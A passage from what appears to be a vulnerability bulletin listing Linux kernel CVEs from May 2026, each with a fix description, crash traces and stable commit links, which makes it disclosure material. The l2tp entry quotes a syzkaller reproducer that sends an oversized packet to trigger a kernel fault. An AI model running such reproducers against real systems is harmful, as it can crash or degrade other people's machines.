follows: ext4_mb_find_by_goal ext4_mb_load_buddy ext4_mb_load_buddy_gfp ext4_mb_init_cache ext4_read_block_bitmap_nowait ext4_wait_block_bitmap ext4_validate_block_bitmap if (!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)) return -EFSCORRUPTED; // There's no logs. if (err) return err; // Will return error ext4_lock_group(ac->ac_sb, group); if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info))) // Unreachable goto out; After commit 9008a58e5dce ("ext4: make the bitmap read routines return real error codes") merged, Commit 163a203ddb36 ("ext4: mark block group as corrupt on block bitmap error") is no real solution for allocating blocks from corrupted block groups. This is because if 'EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)' is true, then 'ext4_mb_load_buddy()' may return an error. This means that the block allocation will fail. Therefore, check block group if corrupted when ext4_mb_load_buddy() returns error. | 2026-05-05 | not yet calculated | CVE-2026-43068 | https://git.kernel.org/stable/c/fea6b2e250ff48f10d166011b57a8516ae5438c9 https://git.kernel.org/stable/c/0b84571c886719823d537f05f4f07cad6357c4b7 https://git.kernel.org/stable/c/ffc0a282462d45fee5957621be5afa29752f3b6d https://git.kernel.org/stable/c/2d31a5073f86a177edf44015e0dedb0c47cfd6d8 https://git.kernel.org/stable/c/9370207b36d26e45a8c8ef0500706d37036edd6b https://git.kernel.org/stable/c/1895f7904be71c48f1e6f338b28f24dabd6b8aeb https://git.kernel.org/stable/c/1c0d7c4cde38a887c6d74e0c89ddb25226943c78 https://git.kernel.org/stable/c/46066e3a06647c5b186cc6334409722622d05c44 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_ll: Fix firmware leak on error path Smatch reports: drivers/bluetooth/hci_ll.c:587 download_firmware() warn: 'fw' from request_firmware() not released on lines: 544. In download_firmware(), if request_firmware() succeeds but the returned firmware content is invalid (no data or zero size), the function returns without releasing the firmware, resulting in a resource leak. Fix this by calling release_firmware() before returning when request_firmware() succeeded but the firmware content is invalid. | 2026-05-05 | not yet calculated | CVE-2026-43069 | https://git.kernel.org/stable/c/95e8601af227b2b4390eecf8db6abdb9f6a91f17 https://git.kernel.org/stable/c/e6d95488c8c964d1df0d3e1db44c958706311e86 https://git.kernel.org/stable/c/b2dfbf1b5ff192cefd49574b951a4af9ddd32213 https://git.kernel.org/stable/c/28904375d54b436a757641fb0331537778c0de5a https://git.kernel.org/stable/c/5213ef54528dd1ac79b846e30d8f72ce092794aa https://git.kernel.org/stable/c/9ecbfd93cd6de6c78cb7fd51fe079e36c7ff074b https://git.kernel.org/stable/c/a7803df606a7d22e896b030f619e1d9d20ae0c6b https://git.kernel.org/stable/c/31148a7be723aa9f2e8fbd62424825ab8d577973 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: platform_get_irq_byname() returns an int platform_get_irq_byname() will return a negative value if an error happens, so it should be checked and not just passed directly into devm_request_threaded_irq() hoping all will be ok. | 2026-05-05 | not yet calculated | CVE-2026-43072 | https://git.kernel.org/stable/c/63c11b19cdc154fa848a6c3b535bfb1dc7b60378 https://git.kernel.org/stable/c/ef2ee9db13b68c5e332b77c0a7108a2d4d56e114 https://git.kernel.org/stable/c/0185e0494a561edfc482507f9de89c2ad798b33d https://git.kernel.org/stable/c/9c10b83a004442c93d7a484c3d221a06a45821e1 https://git.kernel.org/stable/c/0c1b117f7ba46fb8f6ebc5e0bfe5b58568c301ba https://git.kernel.org/stable/c/e597a809a2b97e927060ba182f58eb3e6101bc70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86-64: rename misleadingly named '__copy_user_nocache()' function This function was a masterclass in bad naming, for various historical reasons. It claimed to be a non-cached user copy. It is literally _neither_ of those things. It's a specialty memory copy routine that uses non-temporal stores for the destination (but not the source), and that does exception handling for both source and destination accesses. Also note that while it works for unaligned targets, any unaligned parts (whether at beginning or end) will not use non-temporal stores, since only words and quadwords can be non-temporal on x86. The exception handling means that it _can_ be used for user space accesses, but not on its own - it needs all the normal "start user space access" logic around it. But typically the user space access would be the source, not the non-temporal destination. That was the original intention of this, where the destination was some fragile persistent memory target that needed non-temporal stores in order to catch machine check exceptions synchronously and deal with them gracefully. Thus that non-descriptive name: one use case was to copy from user space into a non-cached kernel buffer. However, the existing users are a mix of that intended use-case, and a couple of random drivers that just did this as a performance tweak. Some of those random drivers then actively misused the user copying version (with STAC/CLAC and all) to do kernel copies without ever even caring about the exception handling, _just_ for the non-temporal destination. Rename it as a first small step to actually make it halfway sane, and change the prototype to be more normal: it doesn't take a user pointer unless the caller has done the proper conversion, and the argument size is the full size_t (it still won't actually copy more than 4GB in one go, but there's also no reason to silently truncate the size argument in the caller). Finally, use this now sanely named function in the NTB code, which mis-used a user copy version (with STAC/CLAC and all) of this interface despite it not actually being a user copy at all. | 2026-05-05 | not yet calculated | CVE-2026-43073 | https://git.kernel.org/stable/c/14b9194db4a28421a4dbe5d6e519efbaa7c5f3cd https://git.kernel.org/stable/c/c6d4e0599e7e73abc04e2488dfeb7940c4039660 https://git.kernel.org/stable/c/d993e1723aa2a085aa0d72e70ea889031fc225b4 https://git.kernel.org/stable/c/efea91ad1729ff1853d7418e4d3bc27d085e72d0 https://git.kernel.org/stable/c/d187a86de793f84766ea40b9ade7ac60aabbb4fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Fix minimum RX size check for decryption The check for the minimum receive buffer size did not take the tag size into account during decryption. Fix this by adding the required extra length. | 2026-05-06 | not yet calculated | CVE-2026-43077 | https://git.kernel.org/stable/c/74a66fdb5282d89e348b00c42cfca3a936946d94 https://git.kernel.org/stable/c/fd427dd84f224309afbcc2cb67c7bb770a01265c https://git.kernel.org/stable/c/1c76b5675119f694458293a2a81f40731c69bd32 https://git.kernel.org/stable/c/e86ab1e5661386a874fbb8551f0c04b8e9f8ad22 https://git.kernel.org/stable/c/af2fa2fbbced26129813274b8b3f7705f280e174 https://git.kernel.org/stable/c/78cea133daf721698876e56135049a96d39d610a https://git.kernel.org/stable/c/3afdc15d6173614d7d834517d9b65e7aa5a08548 https://git.kernel.org/stable/c/3d14bd48e3a77091cbce637a12c2ae31b4a1687c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Skip discovery table for offline dies This warning can be triggered if NUMA is disabled and the system boots with fewer CPUs than the number of CPUs in die 0. WARNING: CPU: 9 PID: 7257 at uncore.c:1157 uncore_pci_pmu_register+0x136/0x160 [intel_uncore] Currently, the discovery table continues to be parsed even if all CPUs in the associated die are offline. This can lead to an array overflow at "pmu->boxes[die] = box" in uncore_pci_pmu_register(), which may trigger the warning above or cause other issues. | 2026-05-06 | not yet calculated | CVE-2026-43079 | https://git.kernel.org/stable/c/cfab2c817d2e7e0bee98d66850246ce842ed5f18 https://git.kernel.org/stable/c/6cfc187d85f18f976d0fe527d4c6f6171542cc19 https://git.kernel.org/stable/c/f34feda8e0c9535fee3f8870ce8bab53c2798f71 https://git.kernel.org/stable/c/7a2cb02437d92ed14fe494d8994056d5bd2c72b4 https://git.kernel.org/stable/c/7b568e9eba2fad89a696f22f0413d44cf4a1f892 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: l2tp: Drop large packets with UDP encap syzbot reported a WARN on my patch series [1]. The actual issue is an overflow of 16-bit UDP length field, and it exists in the upstream code. My series added a debug WARN with an overflow check that exposed the issue, that's why syzbot tripped on my patches, rather than on upstream code. syzbot's repro: r0 = socket$pppl2tp(0x18, 0x1, 0x1) r1 = socket$inet6_udp(0xa, 0x2, 0x0) connect$inet6(r1, &(0x7f00000000c0)={0xa, 0x0, 0x0, @loopback, 0xfffffffc}, 0x1c) connect$pppl2tp(r0, &(0x7f0000000240)=@pppol2tpin6={0x18, 0x1, {0x0, r1, 0x4, 0x0, 0x0, 0x0, {0xa, 0x4e22, 0xffff, @ipv4={'\x00', '\xff\xff', @empty}}}}, 0x32) writev(r0, &(0x7f0000000080)=[{&(0x7f0000000000)="ee", 0x34000}], 0x1) It basically sends an oversized (0x34000 bytes) PPPoL2TP packet with UDP encapsulation, and l2tp_xmit_core doesn't check for overflows when it assigns the UDP length field. The value gets trimmed to 16 bites. Add an overflow check that drops oversized packets and avoids sending packets with trimmed UDP length to the wire. syzbot's stack trace (with my patch applied): len >= 65536u WARNING: ./include/linux/udp.h:38 at udp_set_len_short include/linux/udp.h:38 [inline], CPU#1: syz.0.17/5957 WARNING: ./include/linux/udp.h:38 at l2tp_xmit_core net/l2tp/l2tp_core.c:1293 [inline], CPU#1: syz.0.17/5957 WARNING: ./include/linux/udp.h:38 at l2tp_xmit_skb+0x1204/0x18d0 net/l2tp/l2tp_core.c:1327, CPU#1: syz.0.17/5957 Modules linked in: CPU: 1 UID: 0 PID: 5957 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:udp_set_len_short include/linux/udp.h:38 [inline] RIP: 0010:l2tp_xmit_core net/l2tp/l2tp_core.c:1293 [inline] RIP: 0010:l2tp_xmit_skb+0x1204/0x18d0 net/l2tp/l2tp_core.c:1327 Code: 0f 0b 90 e9 21 f9 ff ff e8 e9 05 ec f6 90 0f 0b 90 e9 8d f9 ff ff e8 db 05 ec f6 90 0f 0b 90 e9 cc f9 ff ff e8 cd 05 ec f6 90 <0f> 0b 90 e9 de fa ff ff 44 89 f1 80 e1 07 80 c1 03 38 c1 0f 8c 4f RSP: 0018:ffffc90003d67878 EFLAGS: 00010293 RAX: ffffffff8ad985e3 RBX: ffff8881a6400090 RCX: ffff8881697f0000 RDX: 0000000000000000 RSI: 0000000000034010 RDI: 000000000000ffff RBP: dffffc0000000000 R08: 0000000000000003 R09: 0000000000000004 R10: dffffc0000000000 R11: fffff520007acf00 R12: ffff8881baf20900 R13: 0000000000034010 R14: ffff8881a640008e R15: ffff8881760f7000 FS: 000055557e81f500(0000) GS:ffff8882a9467000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000033000 CR3: 00000001612f4000 CR4: 00000000000006f0 Call Trace: <TASK> pppol2tp_sendmsg+0x40a/0x5f0 net/l2tp/l2tp_ppp.c:302 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] sock_write_iter+0x503/0x550 net/socket.c:1195 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1 vfs_writev+0x33c/0x990 fs/read_write.c:1059 do_writev+0x154/0x2e0 fs/read_write.c:1105 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x14d/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f636479c629 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffffd4241c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000014 RAX: ffffffffffffffda RBX: 00007f6364a15fa0 RCX: 00007f636479c629 RDX: 0000000000000001 RSI: 0000200000000080 RDI: 0000000000000003 RBP: 00007f6364832b39 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f6364a15fac R14: 00007f6364a15fa0 R15: 00007f6364a15fa0 </TASK> [1]: https://lore.kernel.org/all/20260226201600.222044-1-alice.kernel@fastmail.im/ | 2026-05-06 | not yet calculated | CVE-2026-43080 | https://git.kernel.org/stable/c/9ccce02d501335f59a02f26c878c5e095b16302f https://git.kernel.org/stable/c/77c1489398c85a844f90205f5e76fd6bc8bb4089 https://git.kernel.org/stable/c/86534c97abd6365a9a021fd767a2023e63c44469 https://git.kernel.org/stable/c/f295fe86e22ff0a2ecebf05e30a387e5cf6f6ddc https://git.kernel.org/stable/c/ebe560ea5f54134279356703e73b7f867c89db13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: fix GENERIC_CMD register field masks for IPA v5.0+ Fix the field masks to match the hardware layout documented in downstream GSI (GSI_V3_0_EE_n_GSI_EE_GENERIC_CMD_*). Notably this fixes a WARN I was seeing when I tried to send "stop" to the MPSS remoteproc while IPA was up. | 2026-05-06 | not yet calculated | CVE-2026-43081 | https://git.kernel.org/stable/c/a7d326dfb13b5a0763eccfd78836fe15199fc499 https://git.kernel.org/stable/c/d1c66396796f23f7201b1addf06f62515035354d https://git.kernel.org/stable/c/bafc45ea30d297002750396d5f10e3018bf2cd60 https://git.kernel.org/stable/c/2aa50d2c1f631b405849da246043c6f683af7489 https://git.kernel.org/stable/c/9709b56d908acc120fe8b4ae250b3c9d749ea832 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: txgbe: leave space for null terminators on property_entry Lists of struct property_entry are supposed to be terminated with an empty property, this driver currently seems to be allocating exactly the amount of entry used. Change the struct definition to leave an extra element for all property_entry. | 2026-05-06 | not yet calculated | CVE-2026-43082 | https://git.kernel.org/stable/c/00e1d650fa4b228ef1faea8e29effe4b4861e6e4 https://git.kernel.org/stable/c/16eb3c2f86de9a21aefe7a6386607d4cd3947a77 https://git.kernel.org/stable/c/8eff73e58e1f8fe991522acb863164319a7f7dd3 https://git.kernel.org/stable/c/92c09262dac565a6b831fd724b81fe4ff76f51b4 https://git.kernel.org/stable/c/5a37d228799b0ec2c277459c83c814a59d310bc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_log: initialize nfgenmsg in NLMSG_DONE terminator When batching multiple NFLOG messages (inst->qlen > 1), __nfulnl_send() appends an NLMSG_DONE terminator with sizeof(struct nfgenmsg) payload via nlmsg_put(), but never initializes the nfgenmsg bytes. The nlmsg_put() helper only zeroes alignment padding after the payload, not the payload itself, so four bytes of stale kernel heap data are leaked to userspace in the NLMSG_DONE message body. Use nfnl_msg_put() to build the NLMSG_DONE terminator, which initializes the nfgenmsg payload via nfnl_fill_hdr(), consistent with how __build_packet_message() already constructs NFULNL_MSG_PACKET headers. | 2026-05-06 | not yet calculated | CVE-2026-43085 | https://git.kernel.org/stable/c/368c22aea490f6f50df831b4f9e3623787686c5b https://git.kernel.org/stable/c/d1399632ba255d2e02c757af5d9f5d9279ce168c https://git.kernel.org/stable/c/d552bcfca323d175664d7444989b04f55666978a https://git.kernel.org/stable/c/15d209bccf9273b4a8b4e579ba0e92d065b6ec8c https://git.kernel.org/stable/c/1f3083aec8836213da441270cdb1ab612dd82cf4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: fix NULL deref in ip_vs_add_service error path When ip_vs_bind_scheduler() succeeds in ip_vs_add_service(), the local variable sched is set to NULL. If ip_vs_start_estimator() subsequently fails, the out_err cleanup calls ip_vs_unbind_scheduler(svc, sched) with sched == NULL. ip_vs_unbind_scheduler() passes the cur_sched NULL check (because svc->scheduler was set by the successful bind) but then dereferences the NULL sched parameter at sched->done_service, causing a kernel panic at offset 0x30 from NULL. Oops: general protection fault, [..] [#1] PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] RIP: 0010:ip_vs_unbind_scheduler (net/netfilter/ipvs/ip_vs_sched.c:69) Call Trace: <TASK> ip_vs_add_service.isra.0 (net/netfilter/ipvs/ip_vs_ctl.c:1500) do_ip_vs_set_ctl (net/netfilter/ipvs/ip_vs_ctl.c:2809) nf_setsockopt (net/netfilter/nf_sockopt.c:102) [..] Fix by simply not clearing the local sched variable after a successful bind. ip_vs_unbind_scheduler() already detects whether a scheduler is installed via svc->scheduler, and keeping sched non-NULL ensures the error path passes the correct pointer to both ip_vs_unbind_scheduler() and ip_vs_scheduler_put(). While the bug is older, the problem popups in more recent kernels (6.2), when the new error path is taken after the ip_vs_start_estimator() call. | 2026-05-06 | not yet calculated | CVE-2026-43086 | https://git.kernel.org/stable/c/730663352c9178f33fcf5929f4a37c1f1ca5a693 https://git.kernel.org/stable/c/4039959315008888dd53c37674d33351817a5166 https://git.kernel.org/stable/c/a32dabacee111cea083ddd57a03635672e1bff29 https://git.kernel.org/stable/c/c2ddbe577e2ebf63f2d8fb15cdc7503af70f3e94 https://git.kernel.org/stable/c/9a91797e61d286805ae10a92cc48959c30800556 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: mcp23s08: Disable all pin interrupts during probe A chip being probed may have the interrupt-on-change feature enabled on some of its pins, for example after a reboot. This can cause the chip to generate interrupts for pins that don't have a registered nested handler, which leads to a kernel crash such as below: [ 7.928897] Unable to handle kernel read from unreadable memory at virtual address 00000000000000ac [ 7.932314] Mem abort info: [ 7.935081] ESR = 0x0000000096000004 [ 7.938808] EC = 0x25: DABT (current EL), IL = 32 bits [ 7.944094] SET = 0, FnV = 0 [ 7.947127] EA = 0, S1PTW = 0 [ 7.950247] FSC = 0x04: level 0 translation fault [ 7.955101] Data abort info: [ 7.957961] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 7.963421] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 7.968447] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 7.973734] user pgtable: 4k pages, 48-bit VAs, pgdp=00000000089b7000 [ 7.980148] [00000000000000ac] pgd=0000000000000000, p4d=0000000000000000 [ 7.986913] Internal error: Oops: 0000000096000004 [#1] SMP [ 7.992545] Modules linked in: [ 8.073678] CPU: 0 UID: 0 PID: 81 Comm: irq/18-4-0025 Not tainted 7.0.0-rc6-gd2b5a1f931c8-dirty #199 [ 8.073689] Hardware name: Khadas VIM3 (DT) [ 8.073692] pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 8.094639] pc : _raw_spin_lock_irq+0x40/0x80 [ 8.098970] lr : handle_nested_irq+0x2c/0x168 [ 8.098979] sp : ffff800082b2bd20 [ 8.106599] x29: ffff800082b2bd20 x28: ffff800080107920 x27: ffff800080104d88 [ 8.106611] x26: ffff000003298080 x25: 0000000000000001 x24: 000000000000ff00 [ 8.113707] x23: 0000000000000001 x22: 0000000000000000 x21: 000000000000000e [ 8.120850] x20: 0000000000000000 x19: 00000000000000ac x18: 0000000000000000 [ 8.135046] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [ 8.135062] x14: ffff800081567ea8 x13: ffffffffffffffff x12: 0000000000000000 [ 8.135070] x11: 00000000000000c0 x10: 0000000000000b60 x9 : ffff800080109e0c [ 8.135078] x8 : 1fffe0000069dbc1 x7 : 0000000000000001 x6 : ffff0000034ede00 [ 8.135086] x5 : 0000000000000000 x4 : ffff0000034ede08 x3 : 0000000000000001 [ 8.163460] x2 : 0000000000000000 x1 : 0000000000000001 x0 : 00000000000000ac [ 8.170560] Call trace: [ 8.180094] _raw_spin_lock_irq+0x40/0x80 (P) [ 8.184443] mcp23s08_irq+0x248/0x358 [ 8.184462] irq_thread_fn+0x34/0xb8 [ 8.184470] irq_thread+0x1a4/0x310 [ 8.195093] kthread+0x13c/0x150 [ 8.198309] ret_from_fork+0x10/0x20 [ 8.201850] Code: d65f03c0 d2800002 52800023 f9800011 (885ffc01) [ 8.207931] ---[ end trace 0000000000000000 ]--- This issue has always been present, but has been latent until commit "f9f4fda15e72" ("pinctrl: mcp23s08: init reg_defaults from HW at probe and switch cache type"), which correctly removed reg_defaults from the regmap and as a side effect changed the behavior of the interrupt handler so that the real value of the MCP_GPINTEN register is now being read from the chip instead of using a bogus 0 default value; a non-zero value for this register can trigger the invocation of a nested handler which may not exist (yet). Fix this issue by disabling all pin interrupts during initialization. | 2026-05-06 | not yet calculated | CVE-2026-43087 | https://git.kernel.org/stable/c/f8c3258541a0680a4ebc08b05b2bc5fdad3288a9 https://git.kernel.org/stable/c/db5b8cecbdf479ad13156af750377e5b43853fab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: af_key: zero aligned sockaddr tail in PF_KEY exports PF_KEY export paths use `pfkey_sockaddr_size()` when reserving sockaddr payload space, so IPv6 addresses occupy 32 bytes on the wire. However, `pfkey_sockaddr_fill()` initializes only the first 28 bytes of `struct sockaddr_in6`, leaving the final 4 aligned bytes uninitialized. Not every PF_KEY message is affected. The state and policy dump builders already zero the whole message buffer before filling the sockaddr payloads. Keep the fix to the export paths that still append aligned sockaddr payloads with plain `skb_put()`: - `SADB_ACQUIRE` - `SADB_X_NAT_T_NEW_MAPPING` - `SADB_X_MIGRATE` Fix those paths by clearing only the aligned sockaddr tail after `pfkey_sockaddr_fill()`. | 2026-05-06 | not yet calculated | CVE-2026-43088 | https://git.kernel.org/stable/c/2e74f974359b5382ecbe8536abbb5b837eb6c724 https://git.kernel.org/stable/c/426c355742f02cf743b347d9d7dbdc1bfbfa31ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm_user: fix info leak in build_mapping() struct xfrm_usersa_id has a one-byte padding hole after the proto field, which ends up never getting set to zero before copying out to userspace. Fix that up by zeroing out the whole structure before setting individual variables. | 2026-05-06 | not yet calculated | CVE-2026-43089 | https://git.kernel.org/stable/c/d3125c541a96fb3c0fc7210112684baf22b6c24d https://git.kernel.org/stable/c/5a1a4b049ddde41466ccac0daeec326254b133f2 https://git.kernel.org/stable/c/f779a6b6cdb6e12baa0663063ac59ab2a8f20c0c https://git.kernel.org/stable/c/700c9622b23c33b5933e6dcea816492c064e4e10 https://git.kernel.org/stable/c/1beb76b2053b68c491b78370794b8ff63c8f8c02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: fix refcount leak in xfrm_migrate_policy_find syzkaller reported a memory leak in xfrm_policy_alloc: BUG: memory leak unreferenced object 0xffff888114d79000 (size 1024): comm "syz.1.17", pid 931 ... xfrm_policy_alloc+0xb3/0x4b0 net/xfrm/xfrm_policy.c:432 The root cause is a double call to xfrm_pol_hold_rcu() in xfrm_migrate_policy_find(). The lookup function already returns a policy with held reference, making the second call redundant. Remove the redundant xfrm_pol_hold_rcu() call to fix the refcount imbalance and prevent the memory leak. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-06 | not yet calculated | CVE-2026-43090 | https://git.kernel.org/stable/c/21e235a36cfb6d145cefb10728f12f5dc5412f54 https://git.kernel.org/stable/c/836ee1b0426ea3db31531e9581cc32f513d24e32 https://git.kernel.org/stable/c/70c2a89a3bc207c3bfbf6f21bb439809e0a4a27a https://git.kernel.org/stable/c/83317cce60a032c49480dcdabe146435bd689d03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: validate MTU against usable frame size on bind AF_XDP bind currently accepts zero-copy pool configurations without verifying that the device MTU fits into the usable frame space provided by the UMEM chunk. This becomes a problem since we started to respect tailroom which is subtracted from chunk_size (among with headroom). 2k chunk size might not provide enough space for standard 1500 MTU, so let us catch such settings at bind time. Furthermore, validate whether underlying HW will be able to satisfy configured MTU wrt XSK's frame size multiplied by supported Rx buffer chain length (that is exposed via net_device::xdp_zc_max_segs). | 2026-05-06 | not yet calculated | CVE-2026-43092 | https://git.kernel.org/stable/c/a55793e5a97d4e39bdb380873a9780fe0010bff6 https://git.kernel.org/stable/c/f669d60db11dbabb96279f2b20f9d1cba43cddb2 https://git.kernel.org/stable/c/25e1e91a8da819924df0b16e3812d7b24c8ce133 https://git.kernel.org/stable/c/b2f4daa6422fd6cc0cec969794dab4a88ea4cea1 https://git.kernel.org/stable/c/36ee60b569ba0dfb6f961333b90d19ab5b323fa9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ixgbevf: add missing negotiate_features op to Hyper-V ops table Commit a7075f501bd3 ("ixgbevf: fix mailbox API compatibility by negotiating supported features") added the .negotiate_features callback to ixgbe_mac_operations and populated it in ixgbevf_mac_ops, but forgot to add it to ixgbevf_hv_mac_ops. This leaves the function pointer NULL on Hyper-V VMs. During probe, ixgbevf_negotiate_api() calls ixgbevf_set_features(), which unconditionally dereferences hw->mac.ops.negotiate_features(). On Hyper-V this results in a NULL pointer dereference: BUG: kernel NULL pointer dereference, address: 0000000000000000 [...] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine [...] Workqueue: events work_for_cpu_fn RIP: 0010:0x0 [...] Call Trace: ixgbevf_negotiate_api+0x66/0x160 [ixgbevf] ixgbevf_sw_init+0xe4/0x1f0 [ixgbevf] ixgbevf_probe+0x20f/0x4a0 [ixgbevf] local_pci_probe+0x50/0xa0 work_for_cpu_fn+0x1a/0x30 [...] Add ixgbevf_hv_negotiate_features_vf() that returns -EOPNOTSUPP and wire it into ixgbevf_hv_mac_ops. The caller already handles -EOPNOTSUPP gracefully. | 2026-05-06 | not yet calculated | CVE-2026-43094 | https://git.kernel.org/stable/c/d8a747057a17ffc79e31df1abb11d05e1669d8e5 https://git.kernel.org/stable/c/2270ebab53128fb73c4a70a292be09094074737f https://git.kernel.org/stable/c/4db7b61ec1d1b2b67c0881b62fc4f9583bc21484 https://git.kernel.org/stable/c/1455ff8809843e6e83f1f5b5c0bcc2224c99a3cb https://git.kernel.org/stable/c/4821d563cd7f251ae728be1a6d04af82a294a5b9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SDCA: Fix errors in IRQ cleanup IRQs are enabled through sdca_irq_populate() from component probe using devm_request_threaded_irq(), this however means the IRQs can persist if the sound card is torn down. Some of the IRQ handlers store references to the card and the kcontrols which can then fail. Some detail of the crash was explained in [1]. Generally it is not advised to use devm outside of bus probe, so the code is updated to not use devm. The IRQ requests are not moved to bus probe time as it makes passing the snd_soc_component into the IRQs very awkward and would the require a second step once the component is available, so it is simpler to just register the IRQs at this point, even though that necessitates some manual cleanup. | 2026-05-06 | not yet calculated | CVE-2026-43095 | https://git.kernel.org/stable/c/b022da127bd9d2217e8f285e643caf5aff6f7f14 https://git.kernel.org/stable/c/4e53116437e919c4b9a9d95fb73ae14fe0cfc8f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv: Fix infinite fault loop on permission-denied GPA intercepts Prevent infinite fault loops when guests access memory regions without proper permissions. Currently, mshv_handle_gpa_intercept() attempts to remap pages for all faults on movable memory regions, regardless of whether the access type is permitted. When a guest writes to a read-only region, the remap succeeds but the region remains read-only, causing immediate re-fault and spinning the vCPU indefinitely. Validate intercept access type against region permissions before attempting remaps. Reject writes to non-writable regions and executes to non-executable regions early, returning false to let the VMM handle the intercept appropriately. This also closes a potential DoS vector where malicious guests could intentionally trigger these fault loops to consume host resources. | 2026-05-06 | not yet calculated | CVE-2026-43096 | https://git.kernel.org/stable/c/02226839079ccc558820a3b25c4c46812927b4ba https://git.kernel.org/stable/c/16cbec24897624051b324aa3a85859c38ca65fde |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: hv: Fix double ida_free in hv_pci_probe error path If hv_pci_probe() fails after storing the domain number in hbus->bridge->domain_nr, there is a call to free this domain_nr via pci_bus_release_emul_domain_nr(), however, during cleanup, the bridge release callback pci_release_host_bridge_dev() also frees the domain_nr causing ida_free to be called on same ID twice and triggering following warning: ida_free called for id=28971 which is not allocated. WARNING: lib/idr.c:594 at ida_free+0xdf/0x160, CPU#0: kworker/0:2/198 Call Trace: pci_bus_release_emul_domain_nr+0x17/0x20 pci_release_host_bridge_dev+0x4b/0x60 device_release+0x3b/0xa0 kobject_put+0x8e/0x220 devm_pci_alloc_host_bridge_release+0xe/0x20 devres_release_all+0x9a/0xd0 device_unbind_cleanup+0x12/0xa0 really_probe+0x1c5/0x3f0 vmbus_add_channel_work+0x135/0x1a0 Fix this by letting pci core handle the free domain_nr and remove the explicit free called in pci-hyperv driver. | 2026-05-06 | not yet calculated | CVE-2026-43097 | https://git.kernel.org/stable/c/21bc8e0ba5c2a081b0a2808c976d4c9dbddf1e48 https://git.kernel.org/stable/c/b6422dff0e518245019233432b6bccfc30b73e2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: s3fwrn5: allocate rx skb before consuming bytes s3fwrn82_uart_read() reports the number of accepted bytes to the serdev core. The current code consumes bytes into recv_skb and may already deliver a complete frame before allocating a fresh receive buffer. If that alloc_skb() fails, the callback returns 0 even though it has already consumed bytes, and it leaves recv_skb as NULL for the next receive callback. That breaks the receive_buf() accounting contract and can also lead to a NULL dereference on the next skb_put_u8(). Allocate the receive skb lazily before consuming the next byte instead. If allocation fails, return the number of bytes already accepted. | 2026-05-06 | not yet calculated | CVE-2026-43098 | https://git.kernel.org/stable/c/d8c2aa3c4a1ec530a485e46a1c4f1a118bb00156 https://git.kernel.org/stable/c/7c31f7a599cf00fad3c204092a91a924126c67e4 https://git.kernel.org/stable/c/6d931680a9851481c3243689488eafed08eeff71 https://git.kernel.org/stable/c/09822d3d6f68a0cdc4626e0c507324a4927f55a9 https://git.kernel.org/stable/c/5c14a19d5b1645cce1cb1252833d70b23635b632 |
